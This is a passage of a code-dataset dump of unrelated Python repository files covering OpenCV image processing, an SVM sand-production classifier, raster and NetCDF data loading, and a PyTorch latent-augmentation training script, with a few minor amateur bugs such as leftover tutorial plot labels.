img[:,:,0])\r\n#cv2.waitKey(0)\r\n\r\nmodel = cnn.Model()\r\n\r\ndef test_convolve2D(data, kernel, stride, padding):\r\n img = data\r\n temp2 = []\r\n convolved_output = []\r\n kernel_size = kernel.shape\r\n\r\n output_shape = cnn.Layer.calc_output_size_padMode(img.shape, np.array(kernel_size), np.array(stride), padding)\r\n\r\n if padding == 'full':\r\n img = cnn.Layer.addPadding(data, kernel_size, stride)\r\n\r\n temp4 = []\r\n for z in range(len(img.shape)):\r\n temp2 = img[:,:,z]\r\n temp3 = []\r\n\r\n for i in np.arange(temp2.shape[0], step=stride[0]):\r\n for j in np.arange(temp2.shape[1], step=stride[1]):\r\n temp = temp2[i:i+kernel_size[0], j:j+kernel_size[1]] \r\n if temp.shape == tuple(kernel_size):\r\n temp3.append((temp*kernel).sum())\r\n\r\n temp4.append(np.array(temp3).reshape(output_shape))\r\n\r\n convolved_output = np.dstack(temp4)\r\n\r\n return convolved_output\r\n\r\n#Padding = Layer()\r\n#data = Padding.addPadding(img_pan, [20,16], [10,8])\r\n\r\n#poolingLayer = MaxPoolingLayer2D([1,1], [2,1], keepDims = True, stride_padding = [100,100], kernel_size = [50,26])\r\n#poolingLayer = MaxPoolingLayer2D([10,18], [2,2])\r\n#new_data = poolingLayer.maxPooling2d(img_pan)\r\n\r\nkernel_random = np.random.randint(2, size=(50,50))/255 #random kernel\r\nkernel_random = kernel_random / np.sum(kernel_random)\r\nkernel_edge = np.array([[-1,-1,-1],[-1,8,-1],[-1,-1,-1]]) #edge detection kernel\r\nkernel_identity = np.array([[0, 0, 0],[0, 1, 0],[0, 0, 0]]) #identity kernel\r\nkernel_sharpening = np.array([[0, -1, 0],[-1, 5, -1],[0, -1, 0]]) #sharpening kernel\r\nkernel_gaussian_blur = (1/16)*np.array([[1, 2, 1],[2, 4, 2],[1, 2, 1]])\r\n\r\n#conv = ConvLayer2D(2, 3, 'valid', 1, name='Something')\r\n\r\n#data = conv.forward(img_pan, True)\r\n\r\n#conv2dLayer = ConvLayer2D(1, kernel.shape, 'valid', 2, 'reLU')\r\n#conv_data = conv2dLayer.convolve2D(img_letter[:,:,0], kernel)\r\n#conv_data2 = conv2dLayer.convolve2D(img_pan[:,:,0], kernel)\r\n\r\nmodel.add(cnn.ConvLayer2D(1, kernel_edge, 'valid', 1, name='Something'))\r\n#model.add(cnn.ReLU_activation())\r\nmodel.add(cnn.ConvLayer2D(1, kernel_identity, 'valid', 1, name='Something'))\r\n \r\n#model.add(cnn.ReLU_activation())\r\n#model.add(MaxPoolingLayer2D([1,1], [2,2], keepDims = False, stride_padding = [100,100], kernel_size = [50,26]))\r\n\r\n#conv_data = model.layers['ConvLayer2D-Something-0'].convolve2D(img_letter, kernel_identity)\r\n#conv_data2 = model.layers['ConvLayer2D-Something-0'].convolve2D(img_pan, kernel_identity)\r\n\r\n#cv2.imshow('something', new_data)\r\n\r\n#cv2.imshow('original_letter', img_letter)\r\n#cv2.imshow('conv_letter', conv_data)\r\n\r\n#cv2.imshow('original_panorama', img_pan)\r\n#cv2.imshow('conv_panorama', conv_data2)\r\n\r\nstart = time.time()\r\ndata = model.forward(img_pan)\r\nend = time.time()\r\n\r\nprint(end - start)\r\n\r\ncv2.imshow('original_panorama', img_pan)\r\nfor i in range(data.shape[0]):\r\n cv2.imshow(f'conv - {i}', data[i])\r\n\r\ncv2.waitKey(0)","repo_name":"chrisfeldkircher/tumor-detection-cnn","sub_path":"cnn/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24172560076","text":"import numpy as np\nimport cv2\n# print(dir(cv2))\nimport matplotlib.pyplot as plt # http://matplotlib.org/api/pyplot_api.html\n\nfpath = u'D:/1111.png'\n# fpath = r\"D:\\PeaceShi\\OneDrive\\Pictures\\HD Pic\\1486472251_atelier-sophie_waifu2x_art_noise0_scale_tta_1.png\"\n# print(os.path.dirname(fpath).join(fpath.split()))\n\nimg = cv2.imread(fpath) # Color image loaded by Opencv2 is in BGR mode.\nimg2 = img.copy()\n\"\"\"# create one window\nwin_name = \"test\"\ncv2.namedWindow(win_name)\nwin2_name = \"test2\"\ncv2.namedWindow(win2_name)\n\"\"\"\n# take off one template\n# rect = (170, 80, 50, 50)\n# cv2.setimageroi(image, rect)\n# image[c1:c1+25,r1:r1+25]\n# template = cv2.cloneImage(image)\n# cv2.showImage(win_name, template)\n\n# template = img[896:1460, 732:1321]\ntemplate = img[600:635, 755:778]\nw, h = template.shape[1] - 1, template.shape[0] -1\ncv2.imshow(\"tepl\", template)\ncv2.waitKey()\n#exit(0)\n\"\"\"\ncv2.imshow(win_name, template)\nprint(dir(image.size))\ncv2.waitKey()\n#cv2.resetImageROI(image)\n#W, H = cv2.getSize(image)\n#w, h = cv2.getSize(template)\n#width = W - w + 1\n#height = H - h + 1\n# result = cv2.createImage((width, height), 32, 1)\n\nwidth, height = image.shape[1] -template.shape[1] +1, image.shape[0] - template.shape[0] + 1\n# http://stackoverflow.com/questions/12881926/create-a-new-rgb-opencv-image-using-python\nresult = np.zeros((width, height, 3), np.uint8)\n# result是一个矩阵,存储了模板与源图像每一帧相比较后的相似值,\ncv2.matchTemplate(image, template, result, cv2.TM_SQDIFF)\n\n# 下面的操作将从矩阵中找到相似值最小的点,从而定位出模板位置\n(min_x, max_y, minloc, maxloc) = cv2.minMaxLoc(result)\n(x, y) = minloc\ncv2.rectangle(image, (int(x), int(y)), (int(x) + w, int(y) + h), (255, 255, 255), 1, 0)\ncv2.showImage(win2_name, image)\n\ncv2.waitKey()\n\"\"\"\n# All the 6 methods for comparison in a list\nmethods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',\n 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\n\nfor meth in methods:\n img = img2.copy()\n method = eval(meth)\n\n # Apply template Matching\n res = cv2.matchTemplate(img, template, method)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n top_left = min_loc\n else:\n top_left = max_loc\n bottom_right = (top_left[0] + w, top_left[1] + h)\n\n cv2.rectangle(img, top_left, bottom_right, 255, 2)\n plt_img = img[..., ::-1]\n plt_res = res[..., ::-1]\n plt.subplot(121), plt.imshow(plt_res, cmap='gray')\n plt.title('Matching Result'), plt.xticks([]), plt.yticks([])\n plt.subplot(122), plt.imshow(plt_img, cmap='gray')\n plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\n plt.suptitle(meth)\n\n plt.show()\n","repo_name":"peaceshi/OpenCV","sub_path":"match_template.py","file_name":"match_template.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40263585935","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 3 20:25:17 2021\r\n\r\n@author: NGWASHIRONALD\r\n\"\"\"\r\n\r\n#This is a binary classification algorithm that predicts whether \r\n#1 the formation will produce sand or 0 the formation will not produce sand \r\n#PART 1: Data Preprocessing \r\n\r\n#Step 1: Importing the libraries \r\nimport numpy as np\r\nimport matplotlib.pyplot as mtp \r\nimport pandas as pd \r\nfrom scipy import stats\r\nimport seaborn as sns; sns.set()\r\n\r\n#importing the dataset \r\ndataset = pd.read_csv(\"ANNDatasetMod.csv\")\r\n#Selecting the independent variables which will influence sanding \r\n#These variables include reservoir depth,overburden, pore pressure,\r\n#Min and Max Horizontal stress, Poisson's ratio, Young's Modulus,\r\n#Friction angle, and shale content. \r\nx = dataset.iloc[:,1:13].values\r\ny = dataset.iloc[:,13].values\r\n#There are no variables to encode so we move to splitting the dataset \r\n#from sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\n#onehotencoder = OneHotEncoder(categorical_features = [1])\r\n#x = onehotencoder.fit_transform(x).toarray()\r\n#Splitting the dataset into the training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 0.30, random_state =109)\r\n#feature Scaling to ease calculations and prevent one independent variable from dominating another\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nx_train =sc.fit_transform(x_train)\r\nx_test = sc.transform(x_test)\r\n\r\n#Import svm model\r\nfrom sklearn import svm\r\n\r\n#Create a svm Classifier\r\nclf = svm.SVC(kernel='linear') # Linear Kernel\r\n\r\n#Train the model using the training sets\r\nclf.fit(x_train, y_train)\r\n\r\n#Predict the response for test dataset\r\ny_pred = clf.predict(x_test)\r\n\r\n#Import scikit-learn metrics module for accuracy calculation\r\nfrom sklearn import metrics\r\n#Creating the Confusion matrix \r\nfrom sklearn.metrics import confusion_matrix \r\ncm= confusion_matrix(y_test, y_pred) \r\nprint(cm)\r\n# Model Accuracy: how often is the classifier correct?\r\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\r\n\r\n# Model Precision: what percentage of positive tuples are labeled as such?\r\nprint(\"Precision:\",metrics.precision_score(y_test, y_pred))\r\n\r\n# Model Recall: what percentage of positive tuples are labelled as such?\r\nprint(\"Recall:\",metrics.recall_score(y_test, y_pred))\r\n\r\nfrom sklearn.metrics import classification_report\r\nprint(classification_report(y_test,y_pred))\r\n\r\n\r\n\r\n\r\nfrom matplotlib.colors import ListedColormap \r\nx_set, y_set = x_train, y_train \r\nx1, x2 = np.meshgrid(np.arange(start = x_set[:, 0].min() - 1, stop = x_set[:, 0].max() + 1, step =0.01), \r\nnp.arange(start = x_set[:, 1].min() - 1, stop = x_set[:, 1].max() + 1, step = 0.01)) \r\nxpred = np.array([x1.ravel(), x2.ravel()] + [np.repeat(0, x1.ravel().size) for _ in range(10)]).T\r\npred = clf.predict(xpred).reshape(x1.shape)\r\nmtp.contour(x1,x2,pred,alpha = 0.75, cmap = ListedColormap(('red','green')))\r\n\r\nmtp.xlim(x1.min(), x1.max()) \r\nmtp.ylim(x2.min(), x2.max()) \r\nfor i, j in enumerate(np.unique(y_set)): \r\n mtp.scatter(x_set[y_set == j, 0], x_set[y_set == j, 1], \r\n c = ListedColormap(('red', 'green'))(i), label = j) \r\nmtp.title('SVM classifier (Training set)') \r\nmtp.xlabel('Age') \r\nmtp.ylabel('Estimated Salary') \r\nmtp.legend() \r\nmtp.show() \r\n\r\nx_set, y_set = x_test, y_test \r\nx1, x2 = np.meshgrid(np.arange(start = x_set[:, 0].min() - 1, stop = x_set[:, 0].max() + 1, step =0.01), \r\nnp.arange(start = x_set[:, 1].min() - 1, stop = x_set[:, 1].max() + 1, step = 0.01)) \r\nxpred = np.array([x1.ravel(), x2.ravel()] + [np.repeat(0, x1.ravel().size) for _ in range(10)]).T\r\npred = clf.predict(xpred).reshape(x1.shape)\r\nmtp.contour(x1,x2,pred,alpha = 0.75, cmap = ListedColormap(('red','green')))\r\n\r\nmtp.xlim(x1.min(), x1.max()) \r\nmtp.ylim(x2.min(), x2.max()) \r\nfor i, j in enumerate(np.unique(y_set)): \r\n mtp.scatter(x_set[y_set == j, 0], x_set[y_set == j, 1], \r\n c = ListedColormap(('red', 'green'))(i), label = j) \r\nmtp.title('SVM classifier (Training set)') \r\nmtp.xlabel('Age') \r\nmtp.ylabel('Estimated Salary') \r\nmtp.legend() \r\nmtp.show() \r\n","repo_name":"nafungchwi/ClassficationProblemOilandGas","sub_path":"SVM_Sand_Production.py","file_name":"SVM_Sand_Production.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10694328528","text":"import cv2\nimport numpy as np\n\n\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\n\n\n\n\nwhile True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n\n circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.2, 100)\n if circles is not None:\n circles = np.round(circles[0,:]).astype(\"int\")\n for (x,y,r) in circles:\n cv2.circle(circles,(x,y),r,(0,255,0),4)\n cv2.rectangle(circles,(x-5,y-5),(x+5,y+5),(0,128,255),-1)\n\n cannyImg = cv2.Canny(gray,100,100)\n cv2.putText(frame,\"Lul git gud\",(320,240),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),1)\n success, img = cap.read()\n cv2.imshow(\"Webcam\",cannyImg)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n","repo_name":"mvog2501/VisionProcessing","sub_path":"OpenCV/readImage.py","file_name":"readImage.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"71806404749","text":"\"\"\"File processor functions that return dataframes when fed a file in order to enable downstream processing.\n\nRaises:\n Exception: _description_\n Exception: _description_\n\nReturns:\n pandas.Dataframe: A dataframe of the input data to be used downstream\n\"\"\"\n\nimport logging\n\nimport numpy\nfrom osgeo import gdal, gdalconst\nimport pandas\nimport xarray\n\n\ndef process_file_by_filetype(filepath, file_type, transformation_metadata):\n dataframe = None\n if file_type == \"geotiff\":\n dataframe = raster2df_processor(\n InRaster=filepath,\n feature_name=transformation_metadata[\"feature_name\"],\n band=int(\n transformation_metadata[\"band\"]\n if \"band\" in transformation_metadata\n and transformation_metadata[\"band\"] != \"\"\n else \"0\"\n ),\n nodataval=int(transformation_metadata[\"null_val\"]),\n date=transformation_metadata[\"date\"]\n if (\n \"date\" in transformation_metadata\n and transformation_metadata[\"date\"] != \"\"\n )\n else None,\n band_name=transformation_metadata[\"band_name\"],\n bands=transformation_metadata[\"bands\"]\n if \"bands\" in transformation_metadata\n else None,\n band_type=transformation_metadata[\"band_type\"]\n if \"band_type\" in transformation_metadata\n else \"category\",\n )\n elif file_type == \"excel\":\n dataframe = pandas.read_excel(filepath, transformation_metadata[\"sheet\"])\n elif file_type != \"csv\":\n dataframe = netcdf2df_processor(filepath)\n else:\n dataframe = pandas.read_csv(filepath)\n\n if dataframe is None:\n raise TypeError(\n \"File failed to process, dataframe returned as None type object\"\n )\n return dataframe\n\n\ndef raster2df_processor(\n InRaster: str,\n feature_name: str = \"feature\",\n band: int = 0,\n nodataval: int = -9999,\n date: str = None,\n band_name: str = \"feature2\",\n bands: dict = None,\n band_type: str = \"category\",\n) -> pandas.DataFrame:\n \"\"\"\n Description\n -----------\n Takes the path of a raster (.tiff) file and produces a Geopandas Data Frame.\n\n Parameters\n ----------\n InRaster: str\n the path of the inumpyut raster file\n feature_name: str\n the name of the feature represented by the pixel values\n band: int, default 1\n the band to operate on\n nodataval: int, default -9999\n the value for no data pixels\n date: str, default None\n date associated with the raster (if any)\n band_name: str, default feature2\n the name of the band data e.g. head_count, flooding\n bands: dict, default None\n passed in meta; dictionary of band identifiers and specifies bands to\n be processed.\n band_type: str, default category\n Specifies band type e.g. category or datetime. If datetime, this data goes into the date column.\n\n Examples\n --------\n Converting a geotiff of rainfall data into a geopandas dataframe\n\n >>> df = raster2df('path_to_raster.geotiff', 'rainfall', band=1)\n\n \"\"\"\n # open the raster and get some properties\n data_source = gdal.OpenShared(InRaster, gdalconst.GA_ReadOnly)\n GeoTrans = data_source.GetGeoTransform()\n ColRange = range(data_source.RasterXSize)\n RowRange = range(data_source.RasterYSize)\n\n # Creating variables for the dataframe and value data type.\n dataframe = pandas.DataFrame()\n\n for x in range(1, data_source.RasterCount + 1):\n # If band has a value, then limit import to the single specified band.\n if band > 0 and band != x:\n continue\n\n # If no bands in meta, then single-band and use band_name\n # If bands, then process only those in the meta.\n if not bands:\n band_value = band_name\n logging.info(\n f\"Single band detected. Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n )\n elif str(x) in bands:\n band_value = bands[str(x)]\n logging.info(\n f\"Multi-band detected Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n )\n elif str(x) not in bands:\n # Processing a band not specified in the meta, so skip it\n logging.info(f\"Skipping band {x} since it is not specified in {bands}.\")\n continue\n else:\n raise Exception(\n f\"Neither single nor multiple bands specified in meta. Current band: {x}, Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n )\n\n # Create columns for the dataframe.\n if not bands:\n columns = [\"longitude\", \"latitude\", feature_name]\n logging.info(f\"Single band detected. Columns are: {columns}\")\n elif band_type == \"datetime\":\n columns = [\"longitude\", \"latitude\", \"date\", feature_name]\n logging.info(f\"Datetime multiband detected. Columns are: {columns}\")\n elif band_type == \"category\":\n # categorical multi-band; add columns during processing.\n columns = [\"longitude\", \"latitude\", band_value]\n logging.info(f\"Categorical multiband detected. Columns are: {columns}\")\n else:\n raise Exception(\n f\"During column processing, neither single nor multiple bands specified in meta. Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n )\n\n rBand = data_source.GetRasterBand(x)\n nData = rBand.GetNoDataValue()\n\n if nData == None:\n logging.warning(f\"No nodataval found, setting to {nodataval}\")\n nData = numpy.float32(nodataval) # set it to something if not set\n else:\n logging.info(f\"Nodataval is: {nData} type is : {type(nData)}\")\n\n # specify the center offset (takes the point in middle of pixel)\n HalfX = GeoTrans[1] / 2\n HalfY = GeoTrans[5] / 2\n\n # Check that NoDataValue is of the same type as the raster data\n RowData = rBand.ReadAsArray(0, 0, data_source.RasterXSize, 1)[0]\n row_data_type = type(RowData[0])\n if type(nData) != row_data_type:\n logging.info(\n f\"NoData type mismatch: NoDataValue is type {type(nData)} and raster data is type {row_data_type}\"\n )\n # e.g. NoDataValue is type and raster data is type \n # Fix float type mismatches so comparison works below (row_value != nData)\n if row_data_type == numpy.float32:\n nData = numpy.float32(nData)\n elif row_data_type == numpy.float64:\n nData = numpy.float64(nData)\n elif row_data_type == numpy.float16:\n nData = numpy.float16(nData)\n\n points = []\n\n for ThisRow in RowRange:\n RowData = rBand.ReadAsArray(0, ThisRow, data_source.RasterXSize, 1)[0]\n for ThisCol in ColRange:\n # need to exclude NaN values since there is no nodataval\n row_value = RowData[ThisCol]\n\n # if the null data value is a straight up nan then we should only check if the row_value is nan\n # however, if the null data value is not nan (e.g. a number) we should make sure that row_value\n # does not equal that number\n if (numpy.isnan(nData) and not (numpy.isnan(row_value))) or (row_value != nData):\n\n # TODO: implement filters on valid pixels\n # for example, the below would ensure pixel values are between -100 and 100\n # if (RowData[ThisCol] <= 100) and (RowData[ThisCol] >= -100):\n\n X = GeoTrans[0] + (ThisCol * GeoTrans[1])\n Y = GeoTrans[3] + (\n ThisRow * GeoTrans[5]\n ) # Y is negative so it's a minus\n # this gives the upper left of the cell, offset by half a cell to get centre\n X += HalfX\n Y += HalfY\n\n # Add the data row to the dataframe.\n if bands == None:\n points.append([X, Y, row_value])\n elif band_type == \"datetime\":\n points.append([X, Y, band_value, row_value])\n else:\n points.append([X, Y, row_value])\n\n # This will make all floats float64, but will be optimized in process().\n new_dataframe = pandas.DataFrame(points, columns=columns)\n\n if dataframe.empty:\n dataframe = new_dataframe\n else:\n # df = df.merge(new_df, left_on=[\"longitude\", \"latitude\"], right_on=[\"longitude\", \"latitude\"])\n if bands and band_type != \"datetime\":\n # df.join(new_df, on=[\"longitude\", \"latitude\"])\n dataframe = dataframe.merge(\n new_dataframe,\n left_on=[\"longitude\", \"latitude\"],\n right_on=[\"longitude\", \"latitude\"],\n )\n else:\n dataframe = dataframe.append(new_dataframe)\n\n # Add the date from the mapper.\n if date and band_type != \"datetime\":\n dataframe[\"date\"] = date\n\n dataframe.sort_values(by=columns, inplace=True)\n\n return dataframe\n\n\ndef netcdf2df_processor(netcdf: str) -> pandas.DataFrame:\n \"\"\"\n Produce a dataframe from a NetCDF4 file.\n\n Parameters\n ----------\n netcdf: str\n Path to the netcdf file\n\n Returns\n -------\n DataFrame\n The resultant dataframe\n \"\"\"\n try:\n data_source = xarray.open_dataset(netcdf)\n except:\n raise AssertionError(\n f\"Improperly formatted netCDF file ({netcdf}), xarray could not convert it to a dataframe.\"\n )\n\n dataframe = data_source.to_dataframe()\n final_dataframe = dataframe.reset_index()\n\n return final_dataframe\n","repo_name":"jataware/elwood","sub_path":"elwood/file_processor.py","file_name":"file_processor.py","file_ext":"py","file_size_in_byte":10050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"14961959645","text":"import argparse\nimport math\nimport time\n\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset, Dataset\n\nfrom datasets import *\nfrom models.network3 import Network3\nfrom result_logger import ResultLogger\nfrom utils import *\n\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('data', metavar='DIR',\n help='path to datasets')\nparser.add_argument('-a', '--arch', metavar='ARCH', default='resnet18',\n help='model architecture')\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('-b', '--batch-size', default=256, type=int,\n metavar='N',\n help='mini-batch size (default: 256), this is the total '\n 'batch size of all GPUs on the current node when '\n 'using Data Parallel or Distributed Data Parallel')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate', dest='lr')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)',\n dest='weight_decay')\nparser.add_argument('--step-size', default=30, type=int)\nparser.add_argument('-p', '--print-freq', default=100, type=int,\n metavar='N', help='print frequency (default: 100)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',\n help='evaluate model on validation set')\nparser.add_argument('--pretrained', dest='pretrained', action='store_true',\n help='use pre-trained model')\nparser.add_argument('--world-size', default=-1, type=int,\n help='number of nodes for distributed training')\nparser.add_argument('--rank', default=-1, type=int,\n help='node rank for distributed training')\nparser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,\n help='url used to set up distributed training')\nparser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend')\nparser.add_argument('--seed', default=0, type=int,\n help='seed for initializing training. ')\nparser.add_argument('--gpu', default=None, type=int,\n help='GPU id to use.')\nparser.add_argument('--multiprocessing-distributed', action='store_true',\n help='Use multi-processing distributed training to launch '\n 'N processes per node, which has N GPUs. This is the '\n 'fastest way to use PyTorch for either single node or '\n 'multi node data parallel training')\nparser.add_argument('--new-size', type=int, default=256)\nparser.add_argument('--crop-size', type=int, default=224)\nparser.add_argument('--datadir', type=str, default='.')\nparser.add_argument('--logdir', type=str, default='.')\nparser.add_argument('--viz-step', type=int, default=1)\nparser.add_argument('--warmup-threshold', type=float, default=None)\nparser.add_argument('--warmup-epochs', type=int, default=0)\nparser.add_argument('--lr-step', type=int, default=None)\nparser.add_argument('--ngpus', default=1, type=int,\n help='number of GPUs to use.')\nparser.add_argument('--clip-grad', type=float, default=None)\nparser.add_argument('--milestones', nargs='+', type=int, default=None)\nparser.add_argument('--gamma', type=float, default=0.1)\nparser.add_argument('--loss', type=str, default=None)\nparser.add_argument('--z-dim', type=int)\nparser.add_argument('--h-dim', type=int)\nparser.add_argument('--generative', action='store_true')\n\nargs = parser.parse_args()\nfree_gpus = get_free_gpu(num=args.ngpus)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = free_gpus\n# os.environ[\"OMP_NUM_THREADS\"] = str(args.ngpus * 4)\n\nbest_acc1 = 0\n\n\nclass RepeatedDataset(Dataset):\n def __init__(self, mus, logvars, targets, rep_nums, class_cnts):\n super(RepeatedDataset, self).__init__()\n mus_list, logvars_list, targets_list = [], [], []\n n_classes = len(rep_nums)\n max_cnt = max(class_cnts)\n\n for i in range(n_classes):\n idx = (targets == i)\n mus_base = list(mus[idx])\n logvars_base = list(logvars[idx])\n targets_base = list(targets[idx])\n if rep_nums[i] <= 0.0:\n mus_list.extend(mus_base)\n logvars_list.extend(logvars_base)\n targets_list.extend(targets_base)\n else:\n mus_list.extend((mus_base * (math.ceil(rep_nums[i])))[:(max_cnt - class_cnts[i])])\n logvars_list.extend((logvars_base * (math.ceil(rep_nums[i])))[:(max_cnt - class_cnts[i])])\n targets_list.extend((targets_base * (math.ceil(rep_nums[i])))[:(max_cnt - class_cnts[i])])\n self.mus_list = mus_list\n self.logvars_list = logvars_list\n self.targets_list = targets_list\n\n def __getitem__(self, index):\n return self.mus_list[index], self.logvars_list[index], self.targets_list[index]\n\n def __len__(self):\n return len(self.mus_list)\n\n\ndef reparameterize(mu, logvar):\n std = (logvar.clamp(-50, 50).exp() + 1e-8) ** 0.5\n eps = torch.randn_like(logvar)\n return eps * std + mu\n\n\ndef get_data(loader, model, args):\n # switch to evaluate mode\n model.eval()\n\n mus = []\n logvars = []\n targets = []\n with torch.no_grad():\n for i, (images, target) in enumerate(tqdm(loader)):\n targets.append(target)\n if args.gpu is not None:\n images = images.cuda(args.gpu, non_blocking=True)\n\n # compute output\n mu, logvar, _ = model.get_z(images)\n mus.append(mu.detach().cpu())\n logvars.append(logvar.detach().cpu())\n\n mus = torch.cat(mus, dim=0)\n logvars = torch.cat(logvars, dim=0)\n targets = torch.cat(targets, dim=0)\n return mus, logvars, targets\n\n\ndef get_rep_nums(dataset):\n class_cnts = dataset.get_class_count()\n max_cnt = max(class_cnts)\n rep_nums = [(max_cnt - class_cnts[i]) / class_cnts[i] for i in range(len(class_cnts))]\n print(rep_nums, class_cnts)\n return rep_nums, class_cnts\n\n\ndef augment_data(mus, logvars, target, rep_nums, class_cnts):\n mus_list, logvars_list, target_list = [], [], []\n n_classes = len(rep_nums)\n max_cnt = max(class_cnts)\n\n for i in range(n_classes):\n idx = (target == i)\n mus_base = mus[idx]\n logvars_base = logvars[idx]\n target_base = target[idx]\n if rep_nums[i] <= 0.0:\n mus_list.append(mus_base)\n logvars_list.append(logvars_base)\n target_list.append(target_base)\n else:\n mus_list.append(mus_base.repeat(math.ceil(rep_nums[i]), 1)[:(max_cnt - class_cnts[i])])\n logvars_list.append(logvars_base.repeat(math.ceil(rep_nums[i]), 1)[:(max_cnt - class_cnts[i])])\n target_list.append(target_base.repeat(math.ceil(rep_nums[i]))[:(max_cnt - class_cnts[i])])\n mus_list = torch.cat(mus_list, 0)\n logvars_list = torch.cat(logvars_list, 0)\n target_list = torch.cat(target_list, 0)\n return mus_list, logvars_list, target_list\n\n\ndef train_classifier(train_loader, model, criterion, optimizer, args, epoch, result_logger):\n losses = AverageMeter('Loss', ':.4e')\n top1 = AverageMeter('Acc@1', ':6.2f')\n top5 = AverageMeter('Acc@5', ':6.2f')\n progress = ProgressMeter(\n len(train_loader),\n [losses, top1, top5],\n prefix=\"Epoch: [{}]\".format(epoch))\n\n # switch to train mode\n model.train()\n\n for i, (mu, logvar, target) in enumerate(train_loader):\n if args.gpu is not None:\n mu = mu.cuda(args.gpu, non_blocking=True)\n logvar = logvar.cuda(args.gpu, non_blocking=True)\n if torch.cuda.is_available():\n target = target.cuda(args.gpu, non_blocking=True)\n\n # compute loss\n z = reparameterize(mu, logvar)\n logits = model(z)\n loss = criterion(logits, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(logits, target, topk=(1, 5))\n losses.update(loss.item(), target.size(0))\n top1.update(acc1[0].item(), target.size(0))\n top5.update(acc5[0].item(), target.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n if args.clip_grad:\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad)\n optimizer.step()\n\n if i % args.print_freq == 0:\n progress.display(i)\n if torch.isnan(loss).any():\n raise RuntimeError(\"nan in loss!\")\n\n\ndef validate(val_loader, model, criterion, args, epoch, result_logger=None):\n batch_time = AverageMeter('Time', ':6.3f')\n top1 = AverageMeter('Acc@1', ':6.2f')\n top5 = AverageMeter('Acc@5', ':6.2f')\n progress = ProgressMeter(\n len(val_loader),\n [batch_time, top1, top5],\n prefix='Test: ')\n # switch to evaluate mode\n model.eval()\n\n probs = []\n targets = []\n with torch.no_grad():\n end = time.time()\n for i, (mu, logvar, target) in enumerate(val_loader):\n if args.gpu is not None:\n mu = mu.cuda(args.gpu, non_blocking=True)\n logvar = logvar.cuda(args.gpu, non_blocking=True)\n targets.append(target)\n if torch.cuda.is_available():\n target = target.cuda(args.gpu, non_blocking=True)\n\n z = reparameterize(mu, logvar)\n logits = model(z)\n prob = torch.softmax(logits, dim=1)\n\n probs.append(prob.detach().cpu())\n # measure accuracy and record loss\n acc1, acc5 = accuracy(logits, target, topk=(1, 5))\n\n top1.update(acc1[0].item(), target.size(0))\n top5.update(acc5[0].item(), target.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n progress.display(i)\n probs = torch.cat(probs, dim=0)\n predicts = torch.argmax(probs, dim=1)\n targets = torch.cat(targets, dim=0)\n # TODO: this should also be done with the ProgressMeter\n print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'\n .format(top1=top1, top5=top5))\n\n if result_logger is not None:\n 